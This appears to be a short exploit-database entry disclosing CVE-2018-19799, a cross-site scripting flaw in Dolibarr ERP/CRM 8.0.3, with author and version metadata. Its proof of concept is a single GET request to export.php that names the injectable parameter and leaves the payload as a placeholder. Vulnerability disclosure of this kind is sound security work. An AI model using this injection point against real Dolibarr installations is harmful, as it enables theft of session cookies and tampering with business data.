# Exploit Title: Dolibarr ERP/CRM <= 8.0.3 - Cross-Site Scripting# CVE: CVE-2018-19799# Date: 2018-11-23# Exploit Author: Özkan Mustafa Akkuş (AkkuS)# Contact: https://pentest.com.tr# Vendor Homepage: https://dolibarr.org# Software Link: http://sourceforge.net/projects/dolibarr/files/# Version: v8.0.3# Category: Webapps# Tested on: XAMPP for Linux 7.2.8-0# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business.# (customers, invoices, orders, products, stocks, agenda, e-mailings, shipments...)# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.# Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.# ==================================================================# PoC:# GET Request : /exports/export.php?step=2&datatoexport=[XSS PAYLOAD]&action=selectfield&field=pj.ref&page_y=627
